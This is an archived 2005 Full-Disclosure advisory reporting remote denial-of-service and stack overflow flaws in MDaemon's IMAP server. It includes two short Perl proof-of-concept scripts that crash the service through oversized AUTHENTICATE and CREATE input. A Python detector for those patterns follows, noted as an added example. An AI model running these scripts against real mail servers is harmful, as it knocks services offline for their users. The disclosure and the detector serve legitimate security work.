[Full-disclosure] ALT-N MDaemon multiple vulnerabilities

From: kcope (kingcope_at_gmx.net)
Date: 07/18/05

    Date: Mon, 18 Jul 2005 20:24:09 +0200
    To: full-disclosure@lists.grok.org.uk
    
    

    Hello, this is kcope,

    there are two remote vulnerabilities in the latest ALT-N MDaemon imapd
    product. I don't know if any of them is exploitable .. the stack based
    buffer overflow seems promising, but it's not preauth so I didn't
    investigate it further.

    1.) Remote denial of service in AUTHENTICATE LOGIN and AUTHENTICATE CRAM-MD5
    2.) Remote stack based buffer overflow after authentication in the imap
        CREATE statement

    ---snip---
    ###
    ### MDAEMON remote DoS exploit by kcope
    ### looks like there's a fault in the base64 decoder
    ### works also for AUTHENTICATE LOGIN
    ###

    use IO::Socket::INET;

    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                  PeerPort => '143',
                                  Proto => 'tcp');

    $a = "q" x 1000;

    print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
    print $sock $a,"\r\n";
    print $sock $a,"\r\n";

    while (<$sock>) {
        print $_;
    }
    ---snip---

    ---snip---
    ### MDAEMON stack based buffer overflow
    ### Remote DoS exploit by kcope
    use IO::Socket::INET;
    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                  PeerPort => '143',
                                  Proto => 'tcp');

    $a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;

    print $sock "a001 LOGIN username password\r\n";
    print $sock "a001 CREATE $a\r\n";

    while (<$sock>) {
        print $_;
    }
    ---snip---

    -kcope

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
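
A defender-side check for the two conditions reported above, as an added example that is not part of the original post or of MDaemon: it scans one client-to-server IMAP stream for oversized or non-base64 AUTHENTICATE continuation lines and for overlong CREATE mailbox names. The length limits, the function names and the sample session are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Assumed limits (not from the post): tune them to your own mail environment.
MAX_AUTH_RESPONSE = 512   # base64 characters in one SASL continuation line
MAX_MAILBOX_NAME = 255    # characters in a CREATE mailbox argument

AUTH_RE = re.compile(r"^\S+\s+AUTHENTICATE\s+(CRAM-MD5|LOGIN)\s*$", re.I)
CREATE_RE = re.compile(r"^\S+\s+CREATE\s+(.*)$", re.I)

def is_base64(data):
    """True if data is strictly valid base64 (no stray characters)."""
    try:
        base64.b64decode(data, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False

def scan_client_lines(lines):
    """Return (line_no, reason) findings for one client-to-server IMAP stream."""
    findings = []
    pending = 0  # SASL continuation lines still expected from the client
    for no, raw in enumerate(lines, 1):
        line = raw.rstrip("\r\n")
        if pending:
            pending -= 1
            if line == "*":              # client cancelled the exchange
                pending = 0
            elif len(line) > MAX_AUTH_RESPONSE:
                findings.append((no, "oversized AUTHENTICATE response"))
            elif not is_base64(line):
                findings.append((no, "non-base64 AUTHENTICATE response"))
            continue
        auth = AUTH_RE.match(line)
        if auth:
            # CRAM-MD5 takes one client response, LOGIN takes two.
            pending = 2 if auth.group(1).upper() == "LOGIN" else 1
            continue
        create = CREATE_RE.match(line)
        if create and len(create.group(1).strip('"')) > MAX_MAILBOX_NAME:
            findings.append((no, "overlong CREATE mailbox name"))
    return findings

# Constructed sample session (client side only), not captured traffic.
SAMPLE = ["a001 AUTHENTICATE CRAM-MD5\r\n", "q" * 1000 + "\r\n",
          "a002 LOGIN alice secret\r\n", 'a003 CREATE "Archive/2005"\r\n',
          "a004 CREATE " + "a" * 500 + "\r\n"]

if __name__ == "__main__":
    print(scan_client_lines(SAMPLE))
```

The scanner sees only the client side, so it assumes the server accepted each AUTHENTICATE command; pairing it with server responses would remove that assumption.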

